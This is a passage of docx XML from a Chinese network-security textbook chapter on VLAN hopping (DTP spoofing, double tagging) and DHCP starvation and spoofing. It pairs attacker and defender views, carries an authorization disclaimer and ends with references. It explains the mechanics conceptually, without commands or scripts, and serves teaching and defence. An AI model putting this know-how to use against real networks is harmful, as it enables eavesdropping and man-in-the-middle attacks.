          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议底层基础，建议在掌握欺骗攻防后重读以建立更深的机制级理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1557（Adversary-in-the-Middle）：包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP Cache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Poisoning（T1557.002）的子技术描述、检测数据源和缓解措施，帮助蓝队从业人员将本书的防御知识映射到威胁猎杀框架。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cisco IOS Security Configuration Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Configuring Dynamic ARP Inspection”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节：厂商级的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署最佳实践，是防御对照框中交换机配置的权威参考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide v4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Testing for Weak Transport Layer Security”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Testing for Sensitive Information Sent via Unencrypted Channels”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从应用层安全测试角度补充本节的明文协议风险验证方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="121" w:name="网络层攻击与防御"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络层攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="120" w:name="vlan-跳跃与-dhcp-攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所涉及的二层交换、VLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与以太网帧结构的基本原理，读者可回顾《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（以太网、MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及交换机自学习机制），其中已就广播域隔离、交换机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表行为等提供必要背景。关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议的详细交互过程（DISCOVER–OFFER–REQUEST–ACK、租约状态机、DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消息格式），也已在《从位到物联》相关章节讲授，本节直接以此为基础展开攻击面分析，不再重述协议基础。本节所有攻击演示均限定在概念层面，不提供针对特定厂商设备的可复制攻击脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节讨论的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃、DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">饿死与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造攻击技术，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅允许在读者自建的隔离实验环境、获得书面授权的内部网络模拟平台（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> GNS3、EVE-NG、Cisco CML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等）或官方授权安全培训靶场中复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。严禁在任何生产网络、他人网络或未经明确授权的环境中执行攻击。恶意利用上述技术中断服务、窃取流量或篡改网络配置属于违法行为。实验网络必须与公网及生产环境物理或逻辑隔离，并建议在实验前对虚拟设备进行快照保存，以便回滚。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在二层交换网络中，不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN（Virtual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Local Area </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Network，虚拟局域网）之间的流量隔离依赖于交换机的端口配置，但这一隔离并非由密码学或强认证机制保证，而是依赖于一系列协议约定与默认行为。攻击者一旦能够接入某个普通终端的接入端口，就可能利用交换机对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口的自治协商、双重标签封装等特性，将本不该穿越</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">边界的数据包注入其他</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN，或将自己接入的端口伪装成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口以嗅探跨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量。与此同时，DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身缺乏对服务器的认证，攻击者可以通过耗尽合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的地址池（饿死攻击），或直接部署一个伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，向受害主机分发恶意网关、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等信息，进而实施中间人攻击或将流量牵引到受控主机。上述攻击的共同根源在于：二层控制平面协议的默认信任模型未被打破，且网络设备缺少严格的端口安全验证与速率限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队的目标是识别这些假设被违反的场景，并在接入层交换机上强制实施最小特权原则：任何接入端口均应被静态配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式并绑定预期的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN；对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，禁用动态协商协议，并明确许可允许的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表；在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层面，启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制，将非法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器消息在端口级直接丢弃，同时配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址绑定数据库与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测来防止地址欺骗。监控方面，异常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">速率、交换机端口模式变更日志以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态变化均属于高优先级告警来源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkStart w:id="124" w:name="vlan-跳跃攻击原理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离的逻辑基础在于：交换机根据端口所属的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来标记和转发以太网帧。当端口被配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式时，它属于某一个特定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN，出入该端口的帧不带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签（或被视为属于该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN）；而当端口被配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式时，它可以通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">封装同时承载多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的流量，标签字段中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">决定了帧归属于哪一个广播域。正常的终端设备通常只会连接在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口上，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口仅用于交换机之间或交换机与路由器之间的互联。攻击者要打破</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离，就必须让自己的端口以某种方式进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态，或者利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与标签处理的特性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃攻击主要有两种经典思路：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DTP（Dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Trunking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol，动态中继协议）协商欺骗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">双重标签攻击（Double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tagging）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这两种方法分别利用了交换机自动协商机制的默认开启和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧处理中对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的特殊对待，属于对协议假设的滥用，而非对密码学原语的破解。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="122" w:name="dtp-协商欺骗"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协商欺骗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cisco </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">私有的二层协议，用于交换机端口之间自动协商是否建立</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路。在默认配置下，许多交换机的端口模式为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic auto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic desirable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，这意味着只要对端设备发出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协商消息，端口就有可能动态转换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk。攻击者可以将自己的主机连接到这类端口，并发送伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧，诱使交换机将该端口置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式。一旦端口成为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk，攻击者便能收发所有允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的流量，从而跨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">嗅探甚至直接向其他</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入数据帧。这种攻击完全依赖于管理员未显式关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或未将端口强制设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式，其危害程度取决于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路所允许的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理：DTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为二层自动协商机制，无安全认证，动态模式可能被滥用】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
